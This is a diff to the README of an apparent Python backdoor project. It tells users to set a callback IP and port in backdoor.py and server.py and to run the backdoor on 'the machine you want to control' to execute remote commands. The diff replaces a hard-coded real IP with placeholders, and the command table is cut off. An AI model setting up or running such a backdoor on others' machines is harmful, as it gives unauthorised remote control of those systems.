Advaidv121/Backdoor-And-Server/README.md

 ## Pre Execution ⏮️

-On line number **120** of **server.py** file
+- On line number **137** of **server.py** file
 ```
-36. sock.bind(('xx.xxx.xx.xx',xxxx)) #replace 'xx.xxx.xx.xx'
+137. sock.bind(('xx.xxx.xx.xx',xxxx)) #replace 'xx.xxx.xx.xx' with server ip and xxxx with port number
 ```
-On line number **160** of **backdoor.py** file
+- On line number **153** of **backdoor.py** file
 ```
-160. s.connect(('68.183.89.11',5555))  #replace 'username' 'password'
+153. s.connect(('xx.xxx.xx.xx',xxxx))  #replace 'xx.xxx.xx.xx' with server ip and xxxx with port number
 ```

 ## Execution 🏃‍♂️

-Run the backdoor.py script on the machine you want to control:
+- Run the backdoor.py script on the machine you want to control:
 ```
 python backdoor.py
 ```
-Run the server.py script on the machine from which you want to control the server:
+- Run the server.py script on the machine from which you want to control the server:
 ```
 python server.py
 ```
-This will establish a connection with the server, and you can start sending commands to be executed on the server.🛜
+- This will establish a connection with the server, and you can start sending commands to be executed on the server.🛜

-## Available Commands
+## Available Commands 💡

-Here's a table of the commands you can run on the server from the client:
+- Here's a table of the commands you can run on the server from the client:

 | Command                | Description                                                     |
 |------------------------|-----------------------------------------------------------------|